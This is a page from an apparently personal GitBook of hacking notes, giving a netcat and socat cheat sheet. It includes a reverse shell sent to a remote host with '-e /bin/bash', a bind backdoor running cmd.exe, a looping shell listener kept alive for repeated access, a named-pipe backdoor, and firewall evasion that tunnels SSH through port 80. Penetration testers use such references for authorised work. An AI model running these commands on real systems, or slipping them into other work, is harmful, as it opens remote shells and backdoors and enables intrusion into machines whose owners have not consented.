👨‍💻
Hacking Notes
  • Hacking Notes
  • 💅One-Liners
  • ⚔️Offensive
    • Exploit Workflow
    • Recon
      • OSINT
      • DNS
        • Domain Discovery
      • Layer 2 Config and Analysis
      • Port Scanning and Discovery
      • Port Attacks
      • Link it all together
    • Payloads
      • MSFVenom
      • Reverse Shells
    • Websites
      • Enumeration
      • Injection/LFI
      • Session Management
      • Brute Forcing
      • JavaScript & XSS
      • SSRF
      • XXE
      • PHP
    • Password Attacks
      • Brute Forcing
      • Mimikatz
      • Password Cracking
      • Hash Extraction
      • Wordlist Generation
    • Databases
      • SQL
      • Mongodb
    • Microsoft Windows Exploits
      • Enumeration
      • Powershell
      • Cmd
      • Privilege Escalation
      • Active Directory
      • Bloodhound
    • Social Engineering
    • Netcat & Socat
    • File Transfers
    • Metasploit
      • Writing Modules
    • PS Empire
    • Priv Escalation
    • Post Exploitation
    • Pivoting
    • Certs and Secrets
    • NGROK
    • Misc.
  • 🛡️Defensive
    • Defensive Notes
    • Windows Forensics
      • Program Execution Artifacts
      • ASEP Locations
      • Event Logs
    • Linux Forensics
    • Network Forensics
      • tshark
      • Wireshark Filters
    • Memory Forensics
    • Stego
    • Malware Analysis
    • Volatility
  • 🌩️Cloud
    • Scope and Shared Responsibility
    • AWS CLI
    • Azure CLI
    • SaaS Attacks
    • PaaS
  • ⌨️Programming
    • Programming Notes
    • Examples and Quick Scripts
    • PowerShell
    • Pwn
      • Windows Pwn
    • Python
      • Basic Python
      • Modules
      • Working with Files
      • Networking
      • Attack Related
      • Scapy
        • Using Scapy
        • Reading PCAP
    • C
      • Code Examples
      • GDB
    • PHP
Powered by GitBook
On this page
  • Netcat
  • Basics
  • More Fancy
  • Firewall Evasion
  • Socat

Was this helpful?

  1. Offensive

Netcat & Socat

Netcat rocks my socks

Netcat

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81

nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53

nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1

nc -nvzw1 10.0.0.1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!

while [ 1 ]; do echo “started”; nc -l -p 1234 -e /bin/sh; done

Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1 on TCP 8123

nc -l -p 4321 | nc 10.0.0.1 8123

Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

Firewall Evasion

If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output

mknod mypipe p
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
ssh backdoor@m4lwhere.org -p 80    # Attcker command to connect to ssh piped thru port 80

Socat

socat is a program which can be used for enhanced netcat usage. Supports SSL and forking

# Below command listens locally on 8080, forwards connections to 10.0.0.1:80
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80

# Listen with SSL and send to std out
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio

PreviousSocial EngineeringNextFile Transfers

Last updated 3 years ago

Was this helpful?

⚔️